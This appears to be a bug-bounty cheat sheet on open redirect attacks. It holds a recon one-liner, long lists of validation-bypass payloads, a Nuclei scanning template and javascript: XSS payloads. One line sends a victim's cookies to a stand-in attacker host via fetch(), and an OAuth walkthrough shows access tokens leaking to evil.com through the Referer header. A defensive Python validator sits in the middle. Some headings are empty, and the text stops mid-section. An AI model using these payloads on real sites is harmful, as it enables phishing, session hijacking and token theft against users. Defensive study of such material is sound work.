You should be looking for open URL redirects in the following areas of your target:
- Sign out application route or API endpoint
- Password resets (inspect the generated token link too, as it may contain a redirect parameter)
- Any important action within the app that requires multiple steps
One-Liner
```bash
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
```
Payloads
A scheme blacklist that only matches the literal https:// prefix is bypassed by dropping the authority separator:
```
https://evil.com   ❌ blocked
https:evil.com     ✅ passes the check
```
```
# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com

# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com

# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com

# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company # .company is a valid TLD
https://attacker.com%E3%80%82example.com # URL-encoded ideographic full stop (U+3002), which browsers treat as a dot
attacker%E3%80%82com
```
```
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\victim.com:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/
```
Parameter Pollution
```
/?next=target.com&next=evil.com
```
Creating a folder named after the victim domain
```
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
Nuclei Template
```yaml
id: mass_48_open_redirect_check

info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"

    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"

      - type: status
        status:
          - 301
          - 302
          - 303
          - 304
          - 307
          - 308
```
DOM Based redirect - XSS
```http
GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com
```
```
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascriptpjavascriptt:confirm`0`
```
Cookie Stealing
```
https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie))
```
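As an added example from the defender's side (not code from the original page), the following Python validator rejects the scheme, authority, domain, TLD and javascript: bypass forms listed in the payload sections above, and the query helper refuses the duplicated next parameter from the Parameter Pollution section. ALLOWED_HOSTS and the parameter name next are placeholders; the validator assumes the value it approves is sent verbatim in the Location header, with no further decoding or concatenation by the application.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts a redirect may land on. Placeholder values: list your own hostnames.
ALLOWED_HOSTS = {"example.com", "www.example.com"}

# A relative target is "/" alone or "/" followed by an ordinary path or query
# character; this excludes "//host", "/\host", "/+/host" and the whitespace
# and control-character variants from the payload lists.
_RELATIVE_PATH = re.compile(r"^/(?:[A-Za-z0-9_.?-]|$)")


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a same-origin path or an http(s) URL whose host is
    exactly allow-listed. Assumes the value is sent verbatim in Location."""
    if not target:
        return False
    decoded = unquote(target)       # judge what the browser will resolve
    # Whitespace, C0/C1 controls and backslashes have no place in a redirect.
    if any(ch <= " " or ch == "\\" or 0x7F <= ord(ch) <= 0x9F for ch in decoded):
        return False
    if decoded.startswith("//"):    # protocol-relative: //host, ///host, //\host
        return False
    try:
        parts = urlsplit(decoded)
        _ = parts.port              # "host:notaport" raises ValueError here
    except ValueError:
        return False
    if parts.scheme == "":          # no scheme: must be a plain same-origin path
        return parts.netloc == "" and bool(_RELATIVE_PATH.match(decoded))
    if parts.scheme not in ("http", "https"):   # javascript:, data:, ...
        return False
    if parts.netloc == "" or "@" in parts.netloc:   # https:evil.com, good.com@evil.com
        return False
    return parts.hostname in allowed_hosts      # exact match: no suffix, prefix or TLD tricks


def redirect_from_query(query_string, param="next", allowed_hosts=ALLOWED_HOSTS):
    """Extract the redirect target from a raw query string. A polluted request
    that carries the parameter more than once is rejected outright, so it no
    longer matters which copy a given framework would have picked."""
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    if len(values) != 1 or not is_safe_redirect(values[0], allowed_hosts):
        return "/"                  # safe fallback: the site root
    return values[0]
```

Exact host matching only helps if the allow-listed hosts do not themselves redirect to arbitrary targets, which is exactly the chained case shown in the OAuth section below.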
URL Validation Bypass
OAuth - Open Redirection to Token Leak
Vulnerable endpoint:
```
https://docs.playstation.com/redirect/?target=https://evil.com
```
Find a token in the URL - OAuth:
```
https://my.playstation.com/?access_token=XYZ123&state=abc
```
The access_token=XYZ123 value is carried in the URL itself, so if this page sends the browser somewhere else it can be leaked through the Referer header.
Smuggle the Token via Referer
```
https://my.playstation.com/login/oauth?redirect_uri=https://docs.playstation.com/redirect/?target=https://evil.com
```
```
Referer: https://my.playstation.com/?access_token=XYZ123&state=abc
```
Go-recon - gr-openredirects: